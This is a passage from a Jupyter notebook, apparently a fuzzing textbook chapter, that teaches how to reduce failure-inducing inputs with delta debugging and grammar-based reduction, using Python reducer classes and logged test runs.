"# Reducing Failure-Inducing Inputs\n\nBy construction, fuzzers create inputs that may be hard to read. This causes issues during _debugging_, when a human has to analyze the exact cause of the failure. In this chapter, we present techniques that _automatically reduce and simplify failure-inducing inputs to a minimum_ in order to ease debugging.",
"_____no_output_____"
],
[
"**Prerequisites**\n\n* The simple \"delta debugging\" technique for reduction has no specific prerequisites.\n* As reduction is typically used together with fuzzing, reading the [chapter on basic fuzzing](Fuzzer.ipynb) is a good idea.\n* The later grammar-based techniques require knowledge on [derivation trees](GrammarFuzzer.ipynb) and [parsing](Parser.ipynb).",
"_____no_output_____"
],
[
"## Synopsis\n<!-- Automatically generated. Do not edit. -->\n\nTo [use the code provided in this chapter](Importing.ipynb), write\n\n```python\n>>> from fuzzingbook.Reducer import <identifier>\n```\n\nand then make use of the following features.\n\n\nA _reducer_ takes a failure-inducing input and reduces it to the minimum that still reproduces the failure. This chapter provides `Reducer` classes that implement such reducers.\n\nHere is a simple example: An arithmetic expression causes an error in the Python interpreter:\n\n```python\n>>> !python -c 'x = 1 + 2 * 3 / 0'\nTraceback (most recent call last):\r\n File \"<string>\", line 1, in <module>\r\nZeroDivisionError: division by zero\r\n```\nCan we reduce this input to a minimum? To use a `Reducer`, one first has to build a `Runner` whose outcome is `FAIL` if the precise error occurs. We therefore build a `ZeroDivisionRunner` whose `run()` method will specifically return a `FAIL` outcome if a `ZeroDivisionError` occurs.\n\n```python\n>>> from Fuzzer import ProgramRunner\n>>> class ZeroDivisionRunner(ProgramRunner):\n>>> \"\"\"Make outcome 'FAIL' if ZeroDivisionError occurs\"\"\"\n>>> def run(self, inp=\"\"):\n>>> result, outcome = super().run(inp)\n>>> if result.stderr.find('ZeroDivisionError') >= 0:\n>>> outcome = 'FAIL'\n>>> return result, outcome\n```\nIf we feed this expression into a `ZeroDivisionRunner`, it will produce an outcome of `FAIL` as designed.\n\n```python\n>>> python_input = \"x = 1 + 2 * 3 / 0\"\n>>> python_runner = ZeroDivisionRunner(\"python\")\n>>> result, outcome = python_runner.run(python_input)\n>>> outcome\n'FAIL'\n```\nDelta Debugging is a simple and robust reduction algorithm. We can tie a `DeltaDebuggingReducer` to this runner, and have it determine the substring that causes the `python` program to fail:\n\n```python\n>>> dd = DeltaDebuggingReducer(python_runner)\n>>> dd.reduce(python_input)\n'3/0'\n```\nThe input is reduced to the maximum: We get the essence of the division by zero.\n\n",
"_____no_output_____"
],
[
"## Why Reducing?\n\nAt this point, we have seen a number of test generation techniques that all in some form produce inputs in order to trigger failures. If they are successful – that is, the program actually fails – we must find out why the failure occurred and how to fix it.",
"_____no_output_____"
],
[
"Here's an example of such a situation. We have a class `MysteryRunner` with a `run()` method that – given its code – can occasionally fail. But under which circumstances does this actually happen? We have deliberately obscured the exact condition in order to make this non-obvious.",
"_____no_output_____"
]
],
[
[
"import bookutils",
"_____no_output_____"
],
[
"from Fuzzer import RandomFuzzer, Runner",
"_____no_output_____"
],
[
"import re",
"_____no_output_____"
],
[
"class MysteryRunner(Runner):\n def run(self, inp):\n x = inp.find(chr(0o17 + 0o31))\n y = inp.find(chr(0o27 + 0o22))\n if x >= 0 and y >= 0 and x < y:\n return (inp, Runner.FAIL)\n else:\n return (inp, Runner.PASS)",
"_____no_output_____"
]
],
[
[
"Let us fuzz the function until we find a failing input.",
"_____no_output_____"
]
],
[
[
"mystery = MysteryRunner()\nrandom_fuzzer = RandomFuzzer()\nwhile True:\n inp = random_fuzzer.fuzz()\n result, outcome = mystery.run(inp)\n if outcome == mystery.FAIL:\n break",
"_____no_output_____"
],
[
"failing_input = result\nfailing_input",
"_____no_output_____"
]
],
[
[
"Something in this input causes `MysteryRunner` to fail. But what is it?",
"_____no_output_____"
],
[
"## Manual Input Reduction\n\nOne important step in the debugging process is _reduction_ – that is, to identify those circumstances of a failure that are relevant for the failure to occur, and to _omit_ (if possible) those parts that are not. As Kernighan and Pike \\cite{Kernighan1999} put it:\n\n> For every circumstance of the problem, check whether it is relevant for the problem to occur. If it is not, remove it from the problem report or the test case in question.",
"_____no_output_____"
],
[
"Specifically for inputs, they suggest a _divide and conquer_ process:\n\n> Proceed by binary search. Throw away half the input and see if the output is still wrong; if not, go back to the previous state and discard the other half of the input.\n\nThis is something we can easily try out, using our last generated input:",
"_____no_output_____"
]
],
[
[
"failing_input",
"_____no_output_____"
]
],
[
[
"For instance, we can see whether the error still occurs if we only feed in the first half:",
"_____no_output_____"
]
],
[
[
"half_length = len(failing_input) // 2 # // is integer division\nfirst_half = failing_input[:half_length]\nmystery.run(first_half)",
"_____no_output_____"
]
],
[
[
"Nope – the first half alone does not suffice. Maybe the second half?",
"_____no_output_____"
]
],
[
[
"second_half = failing_input[half_length:]\nmystery.run(second_half)",
"_____no_output_____"
]
],
[
[
"This did not go so well either. We may still proceed by cutting away _smaller chunks_ – say, one character after another. If our test is deterministic and easily repeated, it is clear that this process eventually will yield a reduced input. But still, it is a rather inefficient process, especially for long inputs. What we need is a _strategy_ that effectively minimizes a failure-inducing input – a strategy that can be automated.",
"_____no_output_____"
],
[
"## Delta Debugging",
"_____no_output_____"
],
[
"One strategy to effectively reduce failure-inducing inputs is _delta debugging_ \\cite{Zeller2002}. Delta Debugging implements the \"binary search\" strategy, as listed above, but with a twist: If neither half fails (also as above), it keeps on cutting away smaller and smaller chunks from the input, until it eliminates individual characters. Thus, after cutting away the first half, we cut away\nthe first quarter, the second quarter, and so on.",
"_____no_output_____"
],
[
"Let us illustrate this on our example, and see what happens if we cut away the first quarter.",
"_____no_output_____"
]
],
[
[
"quarter_length = len(failing_input) // 4\ninput_without_first_quarter = failing_input[quarter_length:]\nmystery.run(input_without_first_quarter)",
"_____no_output_____"
]
],
[
[
"Ah! This has failed, and reduced our failing input by 25%. Let's remove another quarter.",
"_____no_output_____"
]
],
[
[
"input_without_first_and_second_quarter = failing_input[quarter_length * 2:]\nmystery.run(input_without_first_and_second_quarter)",
"_____no_output_____"
]
],
[
[
"This is not too surprising, as we had that one before:",
"_____no_output_____"
]
],
[
[
"second_half",
"_____no_output_____"
],
[
"input_without_first_and_second_quarter",
"_____no_output_____"
]
],
[
[
"How about removing the third quarter, then?",
"_____no_output_____"
]
],
[
[
"input_without_first_and_third_quarter = failing_input[quarter_length:\n quarter_length * 2] + failing_input[quarter_length * 3:]\nmystery.run(input_without_first_and_third_quarter)",
"_____no_output_____"
]
],
[
[
"Ok. Let us remove the fourth quarter.",
"_____no_output_____"
]
],
[
[
"input_without_first_and_fourth_quarter = failing_input[quarter_length:quarter_length * 3]\nmystery.run(input_without_first_and_fourth_quarter)",
"_____no_output_____"
]
],
[
[
"Yes! This has succeeded. Our input is now 50% smaller.",
"_____no_output_____"
],
[
"We have now tried to remove pieces that make up $\\frac{1}{2}$ and $\\frac{1}{4}$ of the original failing string. In the next iteration, we would go and remove even smaller pieces – $\\frac{1}{8}$, $\\frac{1}{16}$ and so on. We continue until we are down to $\\frac{1}{97}$ – that is, individual characters.",
"_____no_output_____"
],
[
"However, this is something we happily let a computer do for us. We first introduce a `Reducer` class as an abstract superclass for all kinds of reducers. The `test()` method runs a single test (with logging, if wanted); the `reduce()` method will eventually reduce an input to the minimum.",
"_____no_output_____"
]
],
[
[
"class Reducer(object):\n def __init__(self, runner, log_test=False):\n \"\"\"Attach reducer to the given `runner`\"\"\"\n self.runner = runner\n self.log_test = log_test\n self.reset()\n\n def reset(self):\n self.tests = 0\n\n def test(self, inp):\n result, outcome = self.runner.run(inp)\n self.tests += 1\n if self.log_test:\n print(\"Test #%d\" % self.tests, repr(inp), repr(len(inp)), outcome)\n return outcome\n\n def reduce(self, inp):\n self.reset()\n # Default: Don't reduce\n return inp",
"_____no_output_____"
]
],
[
[
"The `CachingReducer` variant saves test results, such that we don't have to run the same tests again and again:",
"_____no_output_____"
]
],
[
[
"class CachingReducer(Reducer):\n def reset(self):\n super().reset()\n self.cache = {}\n\n def test(self, inp):\n if inp in self.cache:\n return self.cache[inp]\n\n outcome = super().test(inp)\n self.cache[inp] = outcome\n return outcome",
"_____no_output_____"
]
],
[
[
"Here comes the _Delta Debugging_ reducer. Delta Debugging implements the strategy sketched above: It first removes larger chunks of size $\\frac{1}{2}$; if this does not fail, then we proceed to chunks of size $\\frac{1}{4}$, then $\\frac{1}{8}$ and so on.",
"_____no_output_____"
],
[
"Our implementation uses almost the same Python code as Zeller in \\cite{Zeller2002}; the only difference is that it has been adapted to work on Python 3 and our `Runner` framework. The variable `n` (initially 2) indicates the granularity – in each step, chunks of size $\\frac{1}{n}$ are cut away. If none of the test fails (`some_complement_is_failing` is False), then `n` is doubled – until it reaches the length of the input.",
"_____no_output_____"
]
],
[
[
"class DeltaDebuggingReducer(CachingReducer):\n def reduce(self, inp):\n self.reset()\n assert self.test(inp) != Runner.PASS\n\n n = 2 # Initial granularity\n while len(inp) >= 2:\n start = 0\n subset_length = len(inp) / n\n some_complement_is_failing = False\n\n while start < len(inp):\n complement = inp[:int(start)] + \\\n inp[int(start + subset_length):]\n\n if self.test(complement) == Runner.FAIL:\n inp = complement\n n = max(n - 1, 2)\n some_complement_is_failing = True\n break\n\n start += subset_length\n\n if not some_complement_is_failing:\n if n == len(inp):\n break\n n = min(n * 2, len(inp))\n\n return inp",
"_____no_output_____"
]
],
[
[
"To see how the `DeltaDebuggingReducer` works, let us run it on our failing input. With each step, we see how the remaining input gets smaller and smaller, until only two characters remain:",
"_____no_output_____"
]
],
[
[
"dd_reducer = DeltaDebuggingReducer(mystery, log_test=True)\ndd_reducer.reduce(failing_input)",
"Test #1 ' 7:,>((/$$-/->.;.=;(.%!:50#7*8=$&&=$9!%6(4=&69\\':\\'<3+0-3.24#7=!&60)2/+\";+<7+1<2!4$>92+$1<(3%&5\\'\\'>#' 97 FAIL\nTest #2 '\\'<3+0-3.24#7=!&60)2/+\";+<7+1<2!4$>92+$1<(3%&5\\'\\'>#' 49 PASS\nTest #3 \" 7:,>((/$$-/->.;.=;(.%!:50#7*8=$&&=$9!%6(4=&69':\" 48 PASS\nTest #4 '50#7*8=$&&=$9!%6(4=&69\\':\\'<3+0-3.24#7=!&60)2/+\";+<7+1<2!4$>92+$1<(3%&5\\'\\'>#' 73 FAIL\nTest #5 \"50#7*8=$&&=$9!%6(4=&69':<7+1<2!4$>92+$1<(3%&5''>#\" 49 PASS\nTest #6 '50#7*8=$&&=$9!%6(4=&69\\':\\'<3+0-3.24#7=!&60)2/+\";+' 48 FAIL\nTest #7 '\\'<3+0-3.24#7=!&60)2/+\";+' 24 PASS\nTest #8 \"50#7*8=$&&=$9!%6(4=&69':\" 24 PASS\nTest #9 '9!%6(4=&69\\':\\'<3+0-3.24#7=!&60)2/+\";+' 36 FAIL\nTest #10 '9!%6(4=&69\\':=!&60)2/+\";+' 24 FAIL\nTest #11 '=!&60)2/+\";+' 12 PASS\nTest #12 \"9!%6(4=&69':\" 12 PASS\nTest #13 '=&69\\':=!&60)2/+\";+' 18 PASS\nTest #14 '9!%6(4=!&60)2/+\";+' 18 FAIL\nTest #15 '9!%6(42/+\";+' 12 PASS\nTest #16 '9!%6(4=!&60)' 12 FAIL\nTest #17 '=!&60)' 6 PASS\nTest #18 '9!%6(4' 6 PASS\nTest #19 '6(4=!&60)' 9 FAIL\nTest #20 '6(460)' 6 FAIL\nTest #21 '60)' 3 PASS\nTest #22 '6(4' 3 PASS\nTest #23 '(460)' 5 FAIL\nTest #24 '460)' 4 PASS\nTest #25 '(0)' 3 FAIL\nTest #26 '0)' 2 PASS\nTest #27 '(' 1 PASS\nTest #28 '()' 2 FAIL\nTest #29 ')' 1 PASS\n"
]
],
[
[
"Now we know why `MysteryRunner` fails – it suffices that the input contains two matching parentheses. Delta Debugging determines this in 29 steps. Its result is _1-minimal_, meaning that every character contained is required to produce the error; removing any (as seen in tests `#27` and `#29`, above) no longer makes the test fail. This property is guaranteed by the delta debugging algorithm, which in its last stage always tries to delete characters one by one.",
"_____no_output_____"
],
[
"A reduced test case such as the one above has many advantages:\n\n* A reduced test case __reduces the _cognitive load_ of the programmer__. The test case is shorter and focused, and thus does not burden the programmer with irrelevant details. A reduced input typically leads to shorter executions and smaller program states, both of which reduce the search space as it comes to understanding the bug. In our case, we have eliminated lots of irrelevant input – only the two characters the reduced input contains are relevant.\n\n* A reduced test case __is easier to communicate__. All one needs here is the summary: `MysteryRunner fails on \"()\"`, which is much better than `MysteryRunner fails on a 4100-character input (attached)`.\n\n* A reduced test case helps in __identifying duplicates__. If similar bugs have been reported already, and all of them have been reduced to the same cause (namely that the input contains matching parentheses), then it becomes obvious that all these bugs are different symptoms of the same underlying cause – and would all be resolved at once with one code fix.",
"_____no_output_____"
],
[
"How effective is delta debugging? In the best case (when the left half or the right half fails), the number of tests is logarithmic proportional to the length $n$ of an input (i.e., $O(\\log_2 n)$); this is the same complexity as binary search. In the worst case, though, delta debugging can require a number of tests proportional to $n^2$ (i.e., $O(n^2)$) – this happens in the case when we are down to character granularity, and we have to repeatedly tried to delete all characters, only to find that deleting the last character results in a failure \\cite{Zeller2002}. (This is a pretty pathological situation, though.)",
"_____no_output_____"
],
[
"In general, delta debugging is a robust algorithm that is easy to implement, easy to deploy, and easy to use – provided that the underlying test case is deterministic and runs quickly enough to warrant a number of experiments. As these are the same prerequisites that make fuzzing effective, delta debugging makes an excellent companion to fuzzing.",
"_____no_output_____"
],
[
"## Grammar-Based Input Reduction\n\nIf the input language is syntactically complex, delta debugging may take several attempts at reduction, and may not be able to reduce inputs at all. In the second half of this chapter, we thus introduce an algorithm named _Grammar-Based Reduction_ (or GRABR for short) that makes use of _grammars_ to reduce syntactically complex inputs.",
"_____no_output_____"
],
[
"### Lexical Reduction vs. Syntactic Rules\n\nDespite its general robustness, there are situations in which delta debugging might be inefficient or outright fail. As an example, consider some _expression input_ such as `1 + (2 * 3)`. Delta debugging requires a number of tests to simplify the failure-inducing input, but it eventually returns a minimal input",
"_____no_output_____"
]
],
[
[
"expr_input = \"1 + (2 * 3)\"\ndd_reducer = DeltaDebuggingReducer(mystery, log_test=True)\ndd_reducer.reduce(expr_input)",
"Test #1 '1 + (2 * 3)' 11 FAIL\nTest #2 '2 * 3)' 6 PASS\nTest #3 '1 + (' 5 PASS\nTest #4 '+ (2 * 3)' 9 FAIL\nTest #5 '+ ( 3)' 6 FAIL\nTest #6 ' 3)' 3 PASS\nTest #7 '+ (' 3 PASS\nTest #8 ' ( 3)' 5 FAIL\nTest #9 '( 3)' 4 FAIL\nTest #10 '3)' 2 PASS\nTest #11 '( ' 2 PASS\nTest #12 '(3)' 3 FAIL\nTest #13 '()' 2 FAIL\nTest #14 ')' 1 PASS\nTest #15 '(' 1 PASS\n"
]
],
[
[
"Looking at the tests, above, though, only few of them actually represent syntactically valid arithmetic expressions. In a practical setting, we may want to test a program which actually _parses_ such expressions, and which would _reject_ all invalid inputs. We define a class `EvalMysteryRunner` which first _parses_ the given input (according to the rules of our expression grammar), and _only_ if it fits would it be passed to our original `MysteryRunner`. This simulates a setting in which we test an expression interpreter, and in which only valid inputs can trigger the bug.",
"_____no_output_____"
]
],
[
[
"from Grammars import EXPR_GRAMMAR",
"_____no_output_____"
],
[
"from Parser import EarleyParser # minor dependency",
"_____no_output_____"
],
[
"class EvalMysteryRunner(MysteryRunner):\n def __init__(self):\n self.parser = EarleyParser(EXPR_GRAMMAR)\n\n def run(self, inp):\n try:\n tree, *_ = self.parser.parse(inp)\n except SyntaxError as exc:\n return (inp, Runner.UNRESOLVED)\n\n return super().run(inp)",
"_____no_output_____"
],
[
"eval_mystery = EvalMysteryRunner()",
"_____no_output_____"
]
],
[
[
"Under these circumstances, it turns out that delta debugging utterly fails. None of the reductions it applies yield a syntactically valid input, so the input as a whole remains as complex as it was before.",
"_____no_output_____"
]
],
[
[
"dd_reducer = DeltaDebuggingReducer(eval_mystery, log_test=True)\ndd_reducer.reduce(expr_input)",
"Test #1 '1 + (2 * 3)' 11 FAIL\nTest #2 '2 * 3)' 6 UNRESOLVED\nTest #3 '1 + (' 5 UNRESOLVED\nTest #4 '+ (2 * 3)' 9 UNRESOLVED\nTest #5 '1 2 * 3)' 8 UNRESOLVED\nTest #6 '1 + ( 3)' 8 UNRESOLVED\nTest #7 '1 + (2 *' 8 UNRESOLVED\nTest #8 ' + (2 * 3)' 10 UNRESOLVED\nTest #9 '1+ (2 * 3)' 10 UNRESOLVED\nTest #10 '1 (2 * 3)' 9 UNRESOLVED\nTest #11 '1 + 2 * 3)' 10 UNRESOLVED\nTest #12 '1 + ( * 3)' 10 UNRESOLVED\nTest #13 '1 + (2 3)' 9 UNRESOLVED\nTest #14 '1 + (2 *3)' 10 UNRESOLVED\nTest #15 '1 + (2 * ' 9 UNRESOLVED\nTest #16 '1 (2 * 3)' 10 UNRESOLVED\nTest #17 '1 +(2 * 3)' 10 UNRESOLVED\nTest #18 '1 + (2* 3)' 10 UNRESOLVED\nTest #19 '1 + (2 3)' 10 UNRESOLVED\nTest #20 '1 + (2 * )' 10 UNRESOLVED\nTest #21 '1 + (2 * 3' 10 UNRESOLVED\n"
]
],
[
[
"This behavior is possible if the program under test has several constraints regarding input validity. Delta debugging is not aware of these constraints (nor of the input structure in general), so it might violate these constraints again and again.",
"_____no_output_____"
],
[
"### A Grammmar-Based Reduction Approach\n\nTo reduce inputs with high syntactical complexity, we use another approach: Rather than reducing the input string, we reduce the _tree_ representing its structure. The general idea is to start with a _derivation tree_ coming from parsing the input, and then _substitute subtrees by smaller subtrees of the same type_. These alternate subtrees can either come\n\n1. From the tree itself, or\n2. By applying an alternate grammar expansion using elements from the tree.",
"_____no_output_____"
],
[
"Let us show these two strategies using an example. We start with a derivation tree from an arithmetic expression:",
"_____no_output_____"
]
],
[
[
"from GrammarFuzzer import all_terminals, expansion_to_children, display_tree",
"_____no_output_____"
],
[
"derivation_tree, *_ = EarleyParser(EXPR_GRAMMAR).parse(expr_input)\ndisplay_tree(derivation_tree)",
"_____no_output_____"
]
],
[
[
"### Simplifying by Replacing Subtrees",
"_____no_output_____"
],
[
"To simplify this tree, we could replace any `<expr>` symbol up in the tree with some `<expr>` subtree down in the tree. For instance, we could replace the uppermost `<expr>` with its right `<expr>` subtree, yielding the string `(2 + 3)`:",
"_____no_output_____"
]
],
[
[
"import copy",
"_____no_output_____"
],
[
"new_derivation_tree = copy.deepcopy(derivation_tree)\n# We really should have some query language\nsub_expr_tree = new_derivation_tree[1][0][1][2]\ndisplay_tree(sub_expr_tree)",
"_____no_output_____"
],
[
"new_derivation_tree[1][0] = sub_expr_tree\ndisplay_tree(new_derivation_tree)",
"_____no_output_____"
],
[
"all_terminals(new_derivation_tree)",
"_____no_output_____"
]
],
[
[
"Replacing one subtree by another only works as long as individual elements such as `<expr>` occur multiple times in our tree. In the reduced `new_derivation_tree`, above, we could replace further `<expr>` trees only once more.",
"_____no_output_____"
],
[
"### Simplifying by Alternative Expansions",
"_____no_output_____"
],
[
"A second means to simplify this tree is to apply _alternative expansions_. That is, for a symbol, we check whether there is an alternative expansion with a smaller number of children. Then, we replace the symbol with the alternative expansion, filling in needed symbols from the tree.",
"_____no_output_____"
],
[
"As an example, consider the `new_derivation_tree` above. The applied expansion for `<term>` has been\n\n <term> ::= <term> * <factor>\n \nLet us replace this with the alternative expansion:\n\n <term> ::= <factor>",
"_____no_output_____"
]
],
[
[
"term_tree = new_derivation_tree[1][0][1][0][1][0][1][1][1][0]\ndisplay_tree(term_tree)",
"_____no_output_____"
],
[
"shorter_term_tree = term_tree[1][2]\ndisplay_tree(shorter_term_tree)",
"_____no_output_____"
],
[
"new_derivation_tree[1][0][1][0][1][0][1][1][1][0] = shorter_term_tree\ndisplay_tree(new_derivation_tree)",
"_____no_output_____"
],
[
"all_terminals(new_derivation_tree)",
"_____no_output_____"
]
],
[
[
"If we replace derivation subtrees by (smaller) subtrees, and if we search for alternate expansions that again yield smaller subtrees, we can systematically simplify the input. This could be much faster than delta debugging, as our inputs would always be syntactically valid. However, we need a strategy for when to apply which simplification rule. This is what we develop in the remainder of this section.",
"_____no_output_____"
],
[
"### A Class for Reducing with Grammars\n\nWe introduce the `GrammarReducer` class, which is again a `Reducer`. Note that we derive from `CachingReducer`, as the strategy will produce several duplicates.",
"_____no_output_____"
]
],
[
[
"class GrammarReducer(CachingReducer):\n def __init__(self, runner, parser, log_test=False, log_reduce=False):\n super().__init__(runner, log_test=log_test)\n self.parser = parser\n self.grammar = parser.grammar()\n self.start_symbol = parser.start_symbol()\n self.log_reduce = log_reduce\n self.try_all_combinations = False",
"_____no_output_____"
]
],
[
[
"### A Few Helpers\n\nWe define a number of helper functions, which we will need for our strategy. `tree_list_to_string()` does what the name suggest, creating a string from a list of derivation trees:",
"_____no_output_____"
]
],
[
[
"def tree_list_to_string(q):\n return \"[\" + \", \".join([all_terminals(tree) for tree in q]) + \"]\"",
"_____no_output_____"
],
[
"tree_list_to_string([derivation_tree, derivation_tree])",
"_____no_output_____"
]
],
[
[
"The function `possible_combinations()` takes a list of lists $[[x_1, x_2], [y_1, y_2], \\dots]$ and creates a list of combinations $[[x_1, y_1], [x_1, y_2], [x_2, y_1], [x_2, y_2], \\dots]$.",
"_____no_output_____"
]
],
[
[
"def possible_combinations(list_of_lists):\n if len(list_of_lists) == 0:\n return []\n\n ret = []\n for e in list_of_lists[0]:\n if len(list_of_lists) == 1:\n ret.append([e])\n else:\n for c in possible_combinations(list_of_lists[1:]):\n new_combo = [e] + c\n ret.append(new_combo)\n return ret",
"_____no_output_____"
],
[
"possible_combinations([[1, 2], ['a', 'b']])",
"_____no_output_____"
]
],
[
[
"The functions `number_of_nodes()` and `max_height()` return the number of nodes and the maximum height of the given tree, respectively.",
"_____no_output_____"
]
],
[
[
"def number_of_nodes(tree):\n (symbol, children) = tree\n return 1 + sum([number_of_nodes(c) for c in children])",
"_____no_output_____"
],
[
"number_of_nodes(derivation_tree)",
"_____no_output_____"
],
[
"def max_height(tree):\n (symbol, children) = tree\n if len(children) == 0:\n return 1\n return 1 + max([max_height(c) for c in children])",
"_____no_output_____"
],
[
"max_height(derivation_tree)",
"_____no_output_____"
]
],
[
[
"### Simplification Strategies\n\nLet us now implement our two simplification strategies – replacing subtrees and alternate expansions.",
"_____no_output_____"
],
[
"#### Finding Subtrees\n\nThe method `subtrees_with_symbol()` returns all subtrees in the given tree which's root is equal to the given symbol. If `ignore_root` is set (default), then the root node of `tree` is not compared against. (The `depth` parameter will be discussed below.)",
"_____no_output_____"
]
],
[
[
"class GrammarReducer(GrammarReducer):\n def subtrees_with_symbol(self, tree, symbol, depth=-1, ignore_root=True):\n # Find all subtrees in TREE whose root is SYMBOL.\n # If IGNORE_ROOT is true, ignore the root note of TREE.\n\n ret = []\n (child_symbol, children) = tree\n if depth <= 0 and not ignore_root and child_symbol == symbol:\n ret.append(tree)\n\n # Search across all children\n if depth != 0 and children is not None:\n for c in children:\n ret += self.subtrees_with_symbol(c,\n symbol,\n depth=depth - 1,\n ignore_root=False)\n\n return ret",
"_____no_output_____"
]
],
[
[
"Here's an example: These are all subtrees with `<term>` in our derivation tree `derivation_tree`.",
"_____no_output_____"
]
],
[
[
"grammar_reducer = GrammarReducer(\n mystery,\n EarleyParser(EXPR_GRAMMAR),\n log_reduce=True)",
"_____no_output_____"
],
[
"all_terminals(derivation_tree)",
"_____no_output_____"
],
[
"[all_terminals(t) for t in grammar_reducer.subtrees_with_symbol(\n derivation_tree, \"<term>\")]",
"_____no_output_____"
]
],
[
[
"If we want to replace `<term>` subtrees to simplify the tree, these are the subtrees we could replace them with.",
"_____no_output_____"
],
[
"#### Alternate Expansions",
"_____no_output_____"
],
[
"Our second strategy, simplifying by alternate expansions, is a bit more complex. We first fetch the possible expansions for the given symbol (starting with the ones with the fewest children). For each expansion, we fill in values for the symbols from the subtree (using `subtrees_with_symbols()`, above). We then pick the first possible combination (or _all_ combinations, if the attribute `try_all_combinations` is set).",
"_____no_output_____"
]
],
[
[
"class GrammarReducer(GrammarReducer):\n def alternate_reductions(self, tree, symbol, depth=-1):\n reductions = []\n\n expansions = self.grammar.get(symbol, [])\n expansions.sort(\n key=lambda expansion: len(\n expansion_to_children(expansion)))\n\n for expansion in expansions:\n expansion_children = expansion_to_children(expansion)\n\n match = True\n new_children_reductions = []\n for (alt_symbol, _) in expansion_children:\n child_reductions = self.subtrees_with_symbol(\n tree, alt_symbol, depth=depth)\n if len(child_reductions) == 0:\n match = False # Child not found; cannot apply rule\n break\n\n new_children_reductions.append(child_reductions)\n\n if not match:\n continue # Try next alternative\n\n # Use the first suitable combination\n for new_children in possible_combinations(new_children_reductions):\n new_tree = (symbol, new_children)\n if number_of_nodes(new_tree) < number_of_nodes(tree):\n reductions.append(new_tree)\n if not self.try_all_combinations:\n break\n\n # Sort by number of nodes\n reductions.sort(key=number_of_nodes)\n\n return reductions",
"_____no_output_____"
],
[
"grammar_reducer = GrammarReducer(\n mystery,\n EarleyParser(EXPR_GRAMMAR),\n log_reduce=True)",
"_____no_output_____"
],
[
"all_terminals(derivation_tree)",
"_____no_output_____"
]
],
[
[
"Here are _all_ combinations for `<term>`:",
"_____no_output_____"
]
],
[
[
"grammar_reducer.try_all_combinations = True\nprint([all_terminals(t)\n for t in grammar_reducer.alternate_reductions(derivation_tree, \"<term>\")])",
"['1', '2', '3', '1 * 1', '1 * 3', '2 * 1', '2 * 3', '3 * 1', '3 * 3', '(2 * 3)', '1 * 2 * 3', '2 * 2 * 3', '3 * 2 * 3', '1 * (2 * 3)', '(2 * 3) * 1', '(2 * 3) * 3', '2 * (2 * 3)', '3 * (2 * 3)']\n"
]
],
[
[
"The default, though, is simply to return the first of these:",
"_____no_output_____"
]
],
[
[
"grammar_reducer.try_all_combinations = False\n[all_terminals(t) for t in grammar_reducer.alternate_reductions(\n derivation_tree, \"<term>\")]",
"_____no_output_____"
]
],
[
[
"#### Both Strategies Together",
"_____no_output_____"
],
[
"Let us now merge both strategies. To replace a subtree with a given symbol, we first search for already existing subtrees (using `subtrees_with_symbol()`); then we go for alternate expansions (using `alternate_expansions()`).",
"_____no_output_____"
]
],
[
[
"class GrammarReducer(GrammarReducer):\n def symbol_reductions(self, tree, symbol, depth=-1):\n \"\"\"Find all expansion alternatives for the given symbol\"\"\"\n reductions = (self.subtrees_with_symbol(tree, symbol, depth=depth)\n + self.alternate_reductions(tree, symbol, depth=depth))\n\n # Filter duplicates\n unique_reductions = []\n for r in reductions:\n if r not in unique_reductions:\n unique_reductions.append(r)\n\n return unique_reductions",
"_____no_output_____"
],
[
"grammar_reducer = GrammarReducer(\n mystery,\n EarleyParser(EXPR_GRAMMAR),\n log_reduce=True)",
"_____no_output_____"
],
[
"all_terminals(derivation_tree)",
"_____no_output_____"
]
],
[
[
"These are the possible reductions for `<expr>` nodes. Note how we first return subtrees (`1 + (2 * 3)`, `(2 * 3)`, `2 * 3`) before going for alternate expansions of `<expr>` (`1`).",
"_____no_output_____"
]
],
[
[
"reductions = grammar_reducer.symbol_reductions(derivation_tree, \"<expr>\")\ntree_list_to_string([r for r in reductions])",
"_____no_output_____"
]
],
[
[
"These are the possible reductions for `<term>` nodes. Again, we first have subtrees of the derivation tree, followed by the alternate expansion `1 * 1`.",
"_____no_output_____"
]
],
[
[
"reductions = grammar_reducer.symbol_reductions(derivation_tree, \"<term>\")\ntree_list_to_string([r for r in reductions])",
"_____no_output_____"
]
],
[
[
"### The Reduction Strategy\n\nWe are now able to return a number of alternatives for each symbol in the tree. This is what we apply in the core function of our reduction strategy, `reduce_subtree()`. Starting with `subtree`, for every child, we find possible reductions. For every reduction, we replace the child with the reduction and test the resulting (full) tree. If it fails, our reduction was successful; otherwise, we put the child back into place and try out the next reduction. Eventually, we apply `reduce_subtree()` on all children, reducing these as well.",
"_____no_output_____"
]
],
[
[
"class GrammarReducer(GrammarReducer):\n def reduce_subtree(self, tree, subtree, depth=-1):\n symbol, children = subtree\n if len(children) == 0:\n return False\n\n if self.log_reduce:\n print(\"Reducing\", all_terminals(subtree), \"with depth\", depth)\n\n reduced = False\n while True:\n reduced_child = False\n for i, child in enumerate(children):\n (child_symbol, _) = child\n for reduction in self.symbol_reductions(\n child, child_symbol, depth):\n if number_of_nodes(reduction) >= number_of_nodes(child):\n continue\n\n # Try this reduction\n if self.log_reduce:\n print(\n \"Replacing\",\n all_terminals(\n children[i]),\n \"by\",\n all_terminals(reduction))\n children[i] = reduction\n if self.test(all_terminals(tree)) == Runner.FAIL:\n # Success\n if self.log_reduce:\n print(\"New tree:\", all_terminals(tree))\n reduced = reduced_child = True\n break\n else:\n # Didn't work out - restore\n children[i] = child\n\n if not reduced_child:\n if self.log_reduce:\n print(\"Tried all alternatives for\", all_terminals(subtree))\n break\n\n # Run recursively\n for c in children:\n if self.reduce_subtree(tree, c, depth):\n reduced = True\n\n return reduced",
"_____no_output_____"
]
],
[
[
"All we now need is a few drivers. The method `reduce_tree()` is the main entry point into `reduce_subtree()`:",
"_____no_output_____"
]
],
[
[
"class GrammarReducer(GrammarReducer):\n def reduce_tree(self, tree):\n return self.reduce_subtree(tree, tree)",
"_____no_output_____"
]
],
[
[
"The custom method `parse()` turns a given input into a derivation tree:",
"_____no_output_____"
]
],
[
[
"class GrammarReducer(GrammarReducer):\n def parse(self, inp):\n tree, *_ = self.parser.parse(inp)\n if self.log_reduce:\n print(all_terminals(tree))\n return tree",
"_____no_output_____"
]
],
[
[
"The method `reduce()` is the one single entry point, parsing the input and then reducing it.",
"_____no_output_____"
]
],
[
[
"class GrammarReducer(GrammarReducer):\n def reduce(self, inp):\n tree = self.parse(inp)\n self.reduce_tree(tree)\n return all_terminals(tree)",
"_____no_output_____"
]
],
[
[
"Let us try this out in practice on our input `expr_input` and the `mystery()` function. How quickly can we reduce it?",
"_____no_output_____"
]
],
[
[
"expr_input",
